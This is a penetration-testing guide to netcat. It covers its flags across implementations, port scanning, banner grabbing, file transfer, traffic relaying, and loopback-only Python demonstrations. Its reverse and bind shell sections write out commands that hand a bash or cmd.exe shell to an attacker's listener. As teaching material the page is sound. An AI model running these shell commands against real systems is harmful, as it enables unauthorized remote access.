# Netcat

**Netcat (nc)** is a small networking utility often called the "Swiss Army knife" of networking: it reads and writes raw data across TCP or UDP connections, acting as either a client or a listener, with the connection tied to stdin and stdout. In penetration testing it is used for banner grabbing, quick port checks, ad-hoc file transfer, traffic relaying, and reverse or bind shells. Several implementations share the `nc` name and differ in their flags: the original "Hobbit" netcat (nc110, packaged as `netcat-traditional`), OpenBSD netcat (the `netcat-openbsd` package on many Linux distributions), GNU netcat, and Nmap's Ncat. The commands below use the traditional flag set; where OpenBSD netcat behaves differently, this is noted.

#### Uses of Netcat in Penetration Testing

1. **Port Scanning**
2. **Banner Grabbing**
3. **Transferring Files**
4. **Creating Reverse Shells**
5. **Creating Bind Shells**
6. **Listening for Connections**
7. **Relaying Traffic**

#### Reverse Shell and Bind Shell

* **Reverse Shell**: The target connects back to a listener on the attacker's machine. This works when inbound connections to the target are blocked by a firewall or NAT but outbound connections are allowed, which is the usual situation for workstations and most servers.
* **Bind Shell**: The target opens a listening port that hands out a shell, and the attacker connects to it. This requires that the attacker can reach the port directly: the target needs a routable address and nothing filtering inbound traffic to that port. It also means anyone else who finds the port gets the same shell, because netcat performs no authentication.

In both cases the traffic is plaintext, so commands and output are readable by anyone on the path. The only difference is the direction of the TCP connection, and that direction is exactly what firewalls and NAT care about.

#### Netcat Options and Usage

**Basic Netcat Options**

* `-l`: Listen mode, for inbound connections.
* `-p`: Local (source) port. In traditional netcat and Ncat this also names the listening port when combined with `-l`. Upstream OpenBSD netcat refuses `-p` together with `-l` and takes the listening port as a positional argument instead; Debian-derived packages patch it to accept both forms.
* `-e`: Program to execute once the connection is established, with its stdin and stdout attached to the socket. Present in traditional netcat (when built with `GAPING_SECURITY_HOLE`, as most distribution builds are) and in Ncat (`-e`/`--exec`); absent from OpenBSD netcat.
* `-v`: Verbose mode (repeat it for more detail).
* `-z`: Zero-I/O mode: connect and report, send nothing. Used for scanning.
* `-n`: Numeric-only IP addresses, no DNS lookups.
* `-w <secs>`: Timeout for connects and for the final network read.
* `-u`: UDP mode.
* `-k`: Keep listening after a client disconnects (OpenBSD netcat and Ncat; traditional netcat exits after the first connection closes).
* `-C`: Send CRLF as line ending (OpenBSD netcat and Ncat). Note the capital letter: lower-case `-c` means something else where it exists at all (in Ncat it is `--sh-exec`).
* `-q <secs>` / `-N`: Close the connection after EOF on stdin, after `<secs>` seconds (`-q`, traditional netcat on Debian-based systems) or immediately (`-N`, OpenBSD netcat). Without one of these, a file transfer leaves both ends waiting after the last byte.

**Common Netcat Use Cases**

1. **Port Scanning**

```sh
nc -zv <target_ip> 1-1000
```

* `-z`: Zero-I/O mode: complete the TCP handshake and report, without sending data.
* `-v`: Verbose mode, required to see the per-port results.
* `<target_ip>`: Target IP address.
* `1-1000`: Port range to scan.

This is a full connect scan: every probed port sees a completed handshake, so it is noisy in the target's logs and slow against filtered hosts that silently drop packets. Adding `-n` avoids a DNS lookup and `-w 1` caps the wait per port. For anything beyond a quick check of a handful of ports, a dedicated scanner such as Nmap is the better tool.

2. **Banner Grabbing**

```sh
nc -v <target_ip> <port>
```

* `-v`: Verbose mode.
* `<target_ip>`: Target IP address.
* `<port>`: Target port (e.g., 22 for SSH, 21 for FTP, 80 for HTTP).

Services such as SSH, FTP and SMTP send their version string as soon as the connection opens, so connecting is enough to read it. HTTP servers say nothing until they receive a request: after connecting to port 80, type `HEAD / HTTP/1.0` and press Enter twice; the `Server:` header in the reply is the banner.
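
What the two commands above do on the wire, as an added example that is not part of the original page: a connect scan and two banner grabs written with Python sockets, run against two constructed loopback services (one that talks first, like FTP, and one that stays silent until it gets a request, like HTTP). All ports are ephemeral and the banner strings are invented for the demonstration.

```python
# Added example (not part of the original page): what `nc -zv host 1-1000`
# and `nc -v host port` do, written with Python sockets against two
# constructed loopback services so it runs offline. Ports are ephemeral.
import socket
import threading

FTP_BANNER = b"220 demo-ftp.example ready\r\n"   # constructed sample banner
HTTP_REPLY = b"HTTP/1.0 200 OK\r\nServer: demo/1.0\r\n\r\n"


def start_service(handler, host="127.0.0.1"):
    """Bind an ephemeral port and run handler(conn) for each client in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    handler(conn)
                except OSError:      # includes timeouts from silent clients
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def ftp_like(conn):
    """Talks first, like SSH/FTP/SMTP: a passive read gets the banner."""
    conn.sendall(FTP_BANNER)


def http_like(conn):
    """Silent until it receives a request, like HTTP: a passive read gets nothing."""
    conn.settimeout(2.0)
    request = b""
    while b"\r\n\r\n" not in request:
        chunk = conn.recv(1024)
        if not chunk:
            return
        request += chunk
    if request.startswith((b"GET ", b"HEAD ")):
        conn.sendall(HTTP_REPLY)


def scan_ports(host, ports, timeout=0.3):
    """Connect scan (nc -z): a completed handshake means the port is open."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, probe=b"", timeout=1.0):
    """Connect, optionally send a probe, and return the first bytes the
    service sends (b"" if it stays silent until the timeout)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def find_closed_port(host="127.0.0.1"):
    """Bind and release an ephemeral port; nothing listens on it afterwards."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    _, ftp_port = start_service(ftp_like)
    _, http_port = start_service(http_like)
    targets = [ftp_port, http_port, find_closed_port()]
    print("scan:", scan_ports("127.0.0.1", targets))
    print("ftp, passive:", grab_banner("127.0.0.1", ftp_port))
    print("http, passive:", grab_banner("127.0.0.1", http_port, timeout=0.5))
    print("http, probed:", grab_banner("127.0.0.1", http_port, probe=b"HEAD / HTTP/1.0\r\n\r\n"))
```

The passive grab against the HTTP-like service returns nothing, which is the behaviour that makes people think a port is dead when it is simply waiting for a request; the probed grab returns the `Server:` header.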

3. **Transferring Files**

**Sender:**

```sh
nc -l -p <port> < file_to_send
```

* `-l`: Listen mode.
* `-p`: Local port.

**Receiver:**

```sh
nc <sender_ip> <port> > received_file
```

Either side may be the listener; here the sender listens, so the receiver must be able to reach `<sender_ip>:<port>`. Netcat provides no framing, checksum or encryption: the receiver writes whatever arrives until the connection ends, so compare a hash of both copies afterwards and treat the content as untrusted if the network is. Neither end exits by itself once the file has been sent unless told to close on EOF (`-q 1` with traditional netcat, `-N` with OpenBSD netcat); without that, stop the receiver with Ctrl-C once the byte count stops growing.

4. **Creating a Reverse Shell**

**On the Attacker’s Machine:**

```sh
nc -l -p <port>
```

**On the Target Machine:**

```sh
nc <attacker_ip> <port> -e /bin/bash
```

* `-e`: Program to execute with its input and output attached to the connection (e.g., `/bin/bash` on Linux, `cmd.exe` on Windows). Only traditional netcat and Ncat provide it; OpenBSD netcat does not.

The target makes an outbound connection, which is why this works through NAT and egress-permissive firewalls. The session is plaintext and has no TTY, so interactive programs such as `sudo` or editors misbehave until the shell is upgraded to a PTY.

5. **Creating a Bind Shell**

**On the Target Machine:**

```sh
nc -l -p <port> -e /bin/bash
```

**On the Attacker’s Machine:**

```sh
nc <target_ip> <port>
```

The attacker must be able to reach `<port>` on the target, so this fails behind NAT or an inbound filter. There is no authentication: whoever connects first gets the shell, and traditional netcat exits once that connection closes.

6. **Listening for Connections**

```sh
nc -l -p <port>
```

Accepts one inbound TCP connection and ties it to stdin and stdout. This is the receiving end for reverse shells and file transfers, and a quick way to see exactly what a client sends. Traditional netcat exits when the peer disconnects; OpenBSD netcat and Ncat keep listening if `-k` is given.

7. **Relaying Traffic**

A single pipe carries only one direction: what the local client sends flows to the remote host, but the remote host's replies land on the second netcat's stdout instead of going back to the client. A usable relay, for example to pivot through a host you already control, needs a named pipe for the return path:

```sh
mkfifo /tmp/backpipe
nc -l -p <local_port> 0</tmp/backpipe | nc <remote_ip> <remote_port> 1>/tmp/backpipe
```

The second netcat writes the remote host's replies into the FIFO, and the first netcat reads them as its stdin and sends them on to the local client. Both legs are plaintext, and the relay host sees everything that passes through.
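
The relay above, as an added example that is not part of the original page: a bidirectional TCP relay written with Python sockets so that each direction's copy loop is explicit (a plain `nc | nc` pipe runs only one of them) and every forwarded chunk is logged, which is what a relay on a pivot host lets you observe. The "remote service" is a constructed loopback echo server and all ports are ephemeral.

```python
# Added example (not from the original page): a bidirectional TCP relay, the
# job the mkfifo/nc pair does, written with sockets so the two directions are
# explicit and each byte can be logged. The "remote service" is a constructed
# loopback echo server; all ports are ephemeral.
import socket
import threading


def pump(src, dst, log, label):
    """Copy bytes src -> dst until src sends EOF, then pass the EOF on.
    A one-line `nc | nc` runs exactly one of these; a relay needs two."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append((label, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_relay(remote_host, remote_port, host="127.0.0.1"):
    """Listen locally (nc -l -p local_port); for each client connect to the
    remote (nc remote_ip remote_port) and pump both directions.
    Returns (local_port, log) where log records every forwarded chunk."""
    log = []
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind((host, 0))
    lsock.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = lsock.accept()
            except OSError:
                return
            upstream = socket.create_connection((remote_host, remote_port))
            for src, dst, label in ((client, upstream, "client->remote"),
                                    (upstream, client, "remote->client")):
                threading.Thread(target=pump, args=(src, dst, log, label),
                                 daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock.getsockname()[1], log


def start_upper_echo(host="127.0.0.1"):
    """Constructed stand-in for the remote service: echoes input upper-cased."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def talk_through_relay(relay_port, message, host="127.0.0.1"):
    """Client side: send message, signal EOF, collect the reply until EOF."""
    with socket.create_connection((host, relay_port), timeout=5.0) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return reply
            reply += chunk


def forwarded(log, label):
    """All bytes the relay carried in one direction, in order."""
    return b"".join(data for lbl, data in log if lbl == label)


if __name__ == "__main__":
    echo_port = start_upper_echo()
    relay_port, log = start_relay("127.0.0.1", echo_port)
    print(talk_through_relay(relay_port, b"hello via relay\n"))
    for direction in ("client->remote", "remote->client"):
        print(direction, forwarded(log, direction))
```

Removing the second `pump` thread reproduces the one-directional pipe: the request still reaches the echo server, but the client never receives the reply.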

#### Detailed Examples

**Example: Reverse Shell on Linux**

**Attacker’s Machine:**

```sh
nc -lvp 4444
```

With OpenBSD netcat, drop `-p` and give the port as the positional argument; otherwise it refuses to start.

**Target Machine:**

```sh
nc <attacker_ip> 4444 -e /bin/bash
```

The target's netcat must support `-e` (traditional netcat or Ncat). The shell arrives in plaintext and without a TTY.

**Example: Bind Shell on Windows**

**Target Machine:**

```sh
nc -lvp 4444 -e cmd.exe
```

This assumes an `nc.exe` build with `-e` support has been placed on the target; it is commonly flagged by antivirus, so in practice it is often quarantined on arrival.

**Attacker’s Machine:**

```sh
nc <target_ip> 4444
```

Until the process is killed, anyone who can reach TCP 4444 on the target gets the same unauthenticated `cmd.exe`.

**Example: File Transfer**

**Sender:**

```sh
nc -l -p 4444 < file.txt
```

**Receiver:**

```sh
nc <sender_ip> 4444 > file.txt
```
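
The file transfer described in the Transferring Files section and in the example above, as an added example that is not part of the original page: the same listener-sends, client-receives pattern on the loopback interface, with the two details the commands hide made explicit. The sender must signal EOF (what `-q 1` or `-N` adds; without it the receiver sits there forever), and both sides should compare a hash afterwards, because netcat adds no framing, checksum or authentication. The payload is constructed and the port is ephemeral.

```python
# Added example (not from the original page): the file-transfer pattern
# on the loopback interface, with the two details the nc commands hide.
# The sender must signal EOF (that is what nc -q 1 / nc -N adds), and the
# receiver should verify a hash, because netcat adds no framing, checksum or
# authentication. The payload is constructed; the port is ephemeral.
import hashlib
import socket
import threading

SAMPLE_FILE = b"constructed payload line\n" * 4000   # ~100 KB, spans many recv() calls


def serve_file(data, signal_eof=True, host="127.0.0.1"):
    """Sender side (nc -l -p PORT < file): send everything, then either
    shut down the write side so the peer sees EOF, or keep the connection
    open as a netcat without -q/-N does. Returns the listening port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    hold = threading.Event()   # never set: models nc waiting forever

    def serve():
        conn, _ = srv.accept()
        srv.close()
        conn.sendall(data)
        if signal_eof:
            conn.shutdown(socket.SHUT_WR)   # the FIN that -q / -N produce
            conn.close()
        else:
            hold.wait()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def receive_file(host, port, timeout=5.0):
    """Receiver side (nc HOST PORT > file): read until EOF. Returns None if
    the sender never closes, which is what a hung `nc` looks like."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            return None
    return b"".join(chunks)


def sha256_hex(data):
    """The check to run on both ends afterwards (sha256sum file)."""
    return hashlib.sha256(data).hexdigest()


def transfer(data, signal_eof=True):
    """Run one transfer over loopback; return (received_bytes, hashes_match)."""
    port = serve_file(data, signal_eof=signal_eof)
    received = receive_file("127.0.0.1", port, timeout=1.0)
    ok = received is not None and sha256_hex(received) == sha256_hex(data)
    return received, ok


if __name__ == "__main__":
    received, ok = transfer(SAMPLE_FILE)
    print("with EOF:", len(received), "bytes, hash match:", ok)
    received, ok = transfer(SAMPLE_FILE, signal_eof=False)
    print("without EOF:", received, "hash match:", ok)
```

The second run is the behaviour people see with plain `nc` on both ends: every byte arrives, but the receiver never returns because nobody closed the connection.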

#### References

1. **Netcat Documentation**: [Netcat Guide](https://nc110.sourceforge.io/)
2. **Penetration Testing with Netcat**: [Penetration Testing Lab](https://pentestlab.blog/2012/12/12/netcat-the-swiss-army-knife/)
3. **Reverse Shells and Bind Shells**: [Reverse Shell Cheatsheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

Netcat is small, present or easily dropped on most systems, and does one thing well: move raw bytes between a socket and stdin/stdout. That also defines its limits. It offers no encryption, no authentication and no integrity checking, so every shell or file moved through it is exposed to anyone on the path, and `-e`-capable builds are routinely detected by endpoint security. Knowing which implementation is installed, and which flags it accepts, is half of using it effectively.
